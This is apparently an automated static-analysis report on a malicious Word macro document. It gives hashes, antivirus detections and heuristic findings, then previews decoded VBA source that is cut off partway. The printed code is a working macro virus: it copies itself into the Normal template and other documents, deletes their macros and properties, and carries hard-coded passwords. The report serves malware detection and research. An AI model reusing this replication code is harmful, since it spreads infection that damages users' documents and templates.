Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba5d8dc6a5ee12e4…

MALICIOUS

Office (OLE)

Size: 55.5 KB | Created: 2001-07-17 17:01:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: e7639c0afcba545f26854f32b7fdeebb
SHA-1: 9f2067a82f6658e9574749207c08b79709ad85dc
SHA-256: ba5d8dc6a5ee12e45aab06768e34c9cbd2b40591b1ce31db75faa3a747827408
Risk Score: 260

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits high-severity heuristics for legacy WordBasic macro-virus markers and VBA macros, including AutoOpen and Auto_Close functions. ClamAV detections identify it as 'Doc.Trojan.Shore-5' and an extracted artifact as 'Win.Trojan.C-286'. The presence of these macros strongly suggests the document is intended to execute malicious code, likely for further payload delivery or system compromise.

Heuristics (5)

  • ClamAV: Doc.Trojan.Shore-5 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Shore-5
  • Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Auto_Close macro [high, OLE_VBA_AUTOCLOSE]
    Auto_Close macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 33413 bytes
SHA-256: 50020910d0714f52b466917dd6d498ab1b40d9c4521c553c93617fb277f05154
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ANI"
'
'Thanks to cyberHack, ANDIE_71, Marker, etc.
'I love STM. CHENDRAWASHE 1870
'
'Public declaration
'
'
Public Const SeriesNumber = 1870
Public Const ModuleName = "ANI", mw = "Micropost Wod", _
        OFC = "I Dont Like Peace Anymore ...", _
        Peace = "I Like Chaos Only", _
        SerNum$ = "Series Number", _
        pass = "Password : ", _
        ani = "Protected by. ANDIE_71 ...", _
        scrollCap = "Normal." & ModuleName & ".scrollCaption"

Public Const msg = "Virus Ini Khusus Buat ANI Sayaang ...", _
        aaa = "§·_n²__", bbb = "wenni", ccc = "cool9908", _
        abadacc = "Passwordnya Salah GOBLOK ...", _
        code = "backbone130274", ddd = "junkies9908", eee = "Timor9909"

Public anCap As String, anInt As Single, anPos As Integer, Animated As Boolean, _
        ToolsOptionsDlg As Dialog, _
        OrganizerDlg As Dialog, _
        ToolsTemplatesDlg As Dialog, _
        ToolsMacrosDlg As Dialog, _
        FormatStyleDlg As Dialog

'procedures in ani module
Sub Buggy()
Dim aDocProp As DocumentProperty
    For Each aDocProp In NormalTemplate.CustomDocumentProperties
        aDocProp.Delete
    Next aDocProp
    
    NormalTemplate.CustomDocumentProperties.Add _
            Name:=SerNum$, _
            Type:=msoPropertyTypeNumber, _
            Value:=SeriesNumber, _
            LinkToContent:=False
End Sub


Function getDocPropExist(theObject As Object) As Boolean
Dim adp As DocumentProperty
    getDocPropExist = False
    For Each adp In theObject.CustomDocumentProperties
    With adp
        If .Name = SerNum$ And .Type = msoPropertyTypeNumber And _
            .Value = SeriesNumber Then
            getDocPropExist = True
            Exit Function
        End If
    End With
    Next adp
End Function

Function getModuleExist(theObject As Object) As Boolean
Dim aDocProp As DocumentProperty
    getModuleExist = False
    For Each anObject In theObject.VBProject.VBComponents
        If anObject.Name = ModuleName Then
            getModuleExist = True
            Exit Function
        End If
    Next anObject
End Function
    
Function getInfected(theObject As Object) As Boolean
    getInfected = getModuleExist(theObject) And getDocPropExist(theObject)
End Function

Sub clearMacros(theObject As Object)
Dim aDocProp As DocumentProperty
    For Each anObject In theObject.VBProject.VBComponents
        If anObject.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=theObject.FullName, _
            Name:=anObject.Name, Object:=wdOrganizerObjectProjectItems
        Else
            On Error Resume Next
            With anObject.codemodule
                .deletelines 1, .countoflines
            End With
        End If
    Next anObject
    
    For Each aDocProp In theObject.CustomDocumentProperties
        aDocProp.Delete
    Next aDocProp
End Sub

Sub copyMacros(theSource As Object, theDestination As Object)
Dim aDocProp As DocumentProperty
    If Not getDocPropExist(theDestination) Then _
        theDestination.CustomDocumentProperties.Add _
            Name:=SerNum$, _
            Type:=msoPropertyTypeNumber, _
            Value:=SeriesNumber, _
            LinkToContent:=False

    On Error Resume Next
        Application.OrganizerCopy _
            Source:=theSource.FullName, _
            Destination:=theDestination.FullName, _
            Name:=ModuleName, _
            Object:=wdOrganizerObjectProjectItems
End Sub

Sub Infecting(theSource As Object, theDestination As Object)
    On Error Resume Next
    If Not getInfected(theDestination) Then
        Application.OrganizerRename _
            Source:=theDestination.FullName, _
            Name:=ModuleName, newname:="xxxx",
... (truncated)